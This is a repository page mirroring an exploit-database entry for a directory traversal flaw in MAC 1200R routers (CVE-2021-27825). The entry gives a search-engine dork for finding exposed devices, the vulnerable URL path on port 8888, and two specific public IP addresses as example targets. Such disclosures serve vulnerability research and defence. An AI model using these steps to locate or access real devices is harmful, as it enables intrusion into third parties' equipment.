bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/51315.txt
Exploit-DB 99cef8d064 DB: 2023-04-08 
11 changes to exploits/shellcodes/ghdb

Snitz Forum v1.0 - Blind SQL Injection

Franklin Fueling Systems  TS-550 - Exploit and Default Password

Tenda N300 F3 12.01.01.48 - Malformed HTTP Request Header Processing

MAC 1200R - Directory Traversal

Docker based datastores for IBM Instana 241-2 243-0 - No Authentication

IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE)

ChurchCRM 4.5.1 - Authenticated SQL Injection

NotrinosERP 0.7 - Authenticated Blind SQL Injection

Rukovoditel 3.3.1 - Remote Code Execution (RCE)

Wondershare Dr Fone 12.9.6 - Privilege Escalation
2023-04-08 00:16:27 +00:00

16 lines
No EOL
656 B
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: MAC 1200R - Directory Traversal
# Google Dork: "MAC1200R" && port="8888"
# Date: 2023/03/09
# Exploit Author: Chunlei Shang, Jiangsu Public Information Co., Ltd.
# Vendor Homepage: https://www.mercurycom.com.cn/
# Software Link: https://www.mercurycom.com.cn/product-1-1.html
# Version: all versions. (REQUIRED)
# Tested on: all versions.
# CVE : CVE-2021-27825
1. Attackers can easily find the targets through various search engines with keywords "MAC1200R" && port="8888".
2. Open the affected website like "http://IP:8888/web-static/".
3. For example:
1http://60.251.151.2:8888/web-static/
2http://222.215.15.70:8888/web-static/
Reference in a new issue View git blame Copy permalink